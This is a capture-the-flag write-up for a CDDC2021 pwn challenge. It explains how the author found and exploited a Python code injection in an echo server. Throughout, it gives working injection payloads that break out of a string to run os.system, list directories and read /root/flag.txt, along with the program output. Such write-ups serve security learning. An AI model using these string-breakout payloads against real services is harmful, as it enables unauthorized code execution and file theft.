POP IT [Pwn]

Python code injection attack on an echo server. Third pwn challenge in CDDC2021.

Challenge Description

Your last mission, for now, looks promising. It’s some kind of an echo server. I think you can exploit it easily.

Target: 18.136.182.104 port 60230

Solution

For challenges like these, I like to spam weird characters. Luckily my first one gave me syntax error: ".

This tells me that they are not escaping my quote but is using it to terminate the string, hence having an unclosed quote at the back. Something like this:

print(""")

I took a brave guess that it is Python because of the syntax error message. So I tried to list the current directory and echo it back.

input> ");import os;print(os.system("ls"))#

Program output:

Note: this effectively does something like this (for what I had in mind at this point in time)

print("");import os;print(os.system("ls"))#")

So our payload needs to be in the form of ");<code>#

Hmmm, that means that it doesn’t use print to echo back. I played around a bit and got this:

input> ", end="asdf");#

Error: sendBack() expects 1 argument, 2 received

Sounds like some websocket is being used. So I just need to find out the variables it has and I can leak the current directory, and get the flag.

input> "+'|'.join(dir()))#

Program output: conn|functionPointer|ram|userData|userDataPointer

dir() returns all variables available in the current scope, which is perfect. conn should be the websocket connection. So I can do something like this:

input> ");import os;conn.send('\n'.join(os.listdir(os.getcwd())));#

Program output: lib64
opt
tmp
usr
home
run
libx32
proc
srv
var
dev
media
boot
lib
root
etc
sbin
bin
mnt
lib32
sys
.dockerenv

Changing the directory for a bit:

input> ");import os;conn.send(' '.join(os.listdir(os.getcwd() + 'root')));#

Program output: .bashrc .profile buffer_overflow.py exploit.sh memory flag.txt

Wait what? Buffer overflow???? XD

Final Payload

");conn.send(open('/root/flag.txt').read());#

Flag: CDDC21{Py780n_!$_N!c3}